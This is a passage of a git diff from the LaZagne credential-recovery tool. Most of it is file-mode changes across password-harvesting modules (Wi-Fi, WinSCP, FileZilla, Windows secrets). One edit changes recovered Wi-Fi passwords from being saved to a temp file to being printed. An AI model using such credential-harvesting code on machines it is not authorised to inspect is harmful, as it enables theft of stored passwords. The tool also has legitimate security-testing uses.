constant.appdata + elif 'APPDATA' in os.environ: directory = os.environ['APPDATA'] + '\FileZilla' else: print_debug('ERROR', 'The APPDATA environment variable is not defined.') diff --git a/Windows/src/LaZagne/softwares/sysadmin/ftpnavigator.py b/Windows/src/LaZagne/softwares/sysadmin/ftpnavigator.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/sysadmin/puttycm.py b/Windows/src/LaZagne/softwares/sysadmin/puttycm.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/sysadmin/winscp.py b/Windows/src/LaZagne/softwares/sysadmin/winscp.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/wifi/__init__.py b/Windows/src/LaZagne/softwares/wifi/__init__.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/wifi/wifi.py b/Windows/src/LaZagne/softwares/wifi/wifi.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/wifi/wifipass.py b/Windows/src/LaZagne/softwares/wifi/wifipass.py old mode 100644 new mode 100755 index 6d7dbe48..e7e6ae06 --- a/Windows/src/LaZagne/softwares/wifi/wifipass.py +++ b/Windows/src/LaZagne/softwares/wifi/wifipass.py @@ -62,23 +62,25 @@ def run(self): # store credentials if len(values) != 0: - pwdFound.append(values) + pwdFound.append(values) + # print the results + print_output('Wifi', pwdFound) # If at least one password has been found, we create the file in temp directory - if passwordFound: - try: - filepath = tempfile.gettempdir() - tmp = '' - cpt = 1 - for pwd in pwdFound: - tmp += '[wifi%s]\r\n' % str(cpt) - cpt += 1 - for p in pwd.keys(): - tmp = str(tmp) + str(p) + '=' + str(pwd[p]) + '\r\n' - tmp = str(tmp) + '\r\n' - open(filepath + os.sep + 'TEMP123A.txt','w').write(tmp) - except: - pass + # if passwordFound: + # try: + # filepath = tempfile.gettempdir() + # tmp = '' + # cpt = 1 + # for pwd in pwdFound: + # tmp += '[wifi%s]\r\n' % str(cpt) + # cpt += 1 + # for p in pwd.keys(): + # tmp = str(tmp) + str(p) + '=' + str(pwd[p]) + '\r\n' + # tmp = str(tmp) + '\r\n' + # open(filepath + os.sep + 'TEMP123A.txt','w').write(tmp) + # except: + # pass diff --git a/Windows/src/LaZagne/softwares/windows/__init__.py b/Windows/src/LaZagne/softwares/windows/__init__.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/windows/dot_net.py b/Windows/src/LaZagne/softwares/windows/dot_net.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/windows/network.py b/Windows/src/LaZagne/softwares/windows/network.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/windows/secrets.py b/Windows/src/LaZagne/softwares/windows/secrets.py old mode 100644 new mode 100755 diff --git a/Windows/src/LaZagne/softwares/windows/secretsdump.py b/Windows/src/LaZagne/softwares/windows/secretsdump.py old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic.dll b/Windows/src/browser_history_dll/historic.dll old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/Release/historic.dll b/Windows/src/browser_history_dll/historic/Release/historic.dll old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/Release/historic.exp b/Windows/src/browser_history_dll/historic/Release/historic.exp old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/Release/historic.lib b/Windows/src/browser_history_dll/historic/Release/historic.lib old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/Release/historic.pdb b/Windows/src/browser_history_dll/historic/Release/historic.pdb old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic.sdf b/Windows/src/browser_history_dll/historic/historic.sdf old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic.sln b/Windows/src/browser_history_dll/historic/historic.sln old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic.suo b/Windows/src/browser_history_dll/historic/historic.suo old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/CL.read.1.tlog b/Windows/src/browser_history_dll/historic/historic/Release/CL.read.1.tlog old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/CL.write.1.tlog b/Windows/src/browser_history_dll/historic/historic/Release/CL.write.1.tlog old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/cl.command.1.tlog b/Windows/src/browser_history_dll/historic/historic/Release/cl.command.1.tlog old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/dllmain.obj b/Windows/src/browser_history_dll/historic/historic/Release/dllmain.obj old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/historic.Build.CppClean.log b/Windows/src/browser_history_dll/historic/historic/Release/historic.Build.CppClean.log old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/historic.dll.intermediate.manifest b/Windows/src/browser_history_dll/historic/historic/Release/historic.dll.intermediate.manifest old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/historic.lastbuildstate b/Windows/src/browser_history_dll/historic/historic/Release/historic.lastbuildstate old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/historic.log b/Windows/src/browser_history_dll/historic/historic/Release/historic.log old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/historic.obj b/Windows/src/browser_history_dll/historic/historic/Release/historic.obj old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/historic.pch b/Windows/src/browser_history_dll/historic/historic/Release/historic.pch old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/historic.write.1.tlog b/Windows/src/browser_history_dll/historic/historic/Release/historic.write.1.tlog old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/history.obj b/Windows/src/browser_history_dll/historic/historic/Release/history.obj old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/link.command.1.tlog b/Windows/src/browser_history_dll/historic/historic/Release/link.command.1.tlog old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/link.read.1.tlog b/Windows/src/browser_history_dll/historic/historic/Release/link.read.1.tlog old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/link.write.1.tlog b/Windows/src/browser_history_dll/historic/historic/Release/link.write.1.tlog old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/mt.command.1.tlog b/Windows/src/browser_history_dll/historic/historic/Release/mt.command.1.tlog old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/mt.read.1.tlog b/Windows/src/browser_history_dll/historic/historic/Release/mt.read.1.tlog old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/mt.write.1.tlog b/Windows/src/browser_history_dll/historic/historic/Release/mt.write.1.tlog old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/stdafx.obj b/Windows/src/browser_history_dll/historic/historic/Release/stdafx.obj old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/Release/vc100.pdb b/Windows/src/browser_history_dll/historic/historic/Release/vc100.pdb old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/dllmain.cpp b/Windows/src/browser_history_dll/historic/historic/dllmain.cpp old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/historic.vcxproj b/Windows/src/browser_history_dll/historic/historic/historic.vcxproj old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/historic.vcxproj.filters b/Windows/src/browser_history_dll/historic/historic/historic.vcxproj.filters old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/historic.vcxproj.user b/Windows/src/browser_history_dll/historic/historic/historic.vcxproj.user old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/history.cpp b/Windows/src/browser_history_dll/historic/historic/history.cpp old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/stdafx.cpp b/Windows/src/browser_history_dll/historic/historic/stdafx.cpp old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/stdafx.h b/Windows/src/browser_history_dll/historic/historic/stdafx.h old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/historic/targetver.h b/Windows/src/browser_history_dll/historic/historic/targetver.h old mode 100644 new mode 100755 diff --git a/Windows/src/browser_history_dll/historic/ipch/historic-a0234e08/history-838e9c18.ipch b/Windows/src/browser_history_dll/historic/ipch/historic-a0234e08/history-838e9c18.ipch old mode 100644 new mode 100755 diff --git a/pictures/lazagne.png b/pictures/lazagne.png old mode 100644 new mode 100755 diff --git a/pictures/softwares.png b/pictures/softwares.png old mode 100644 new mode 100755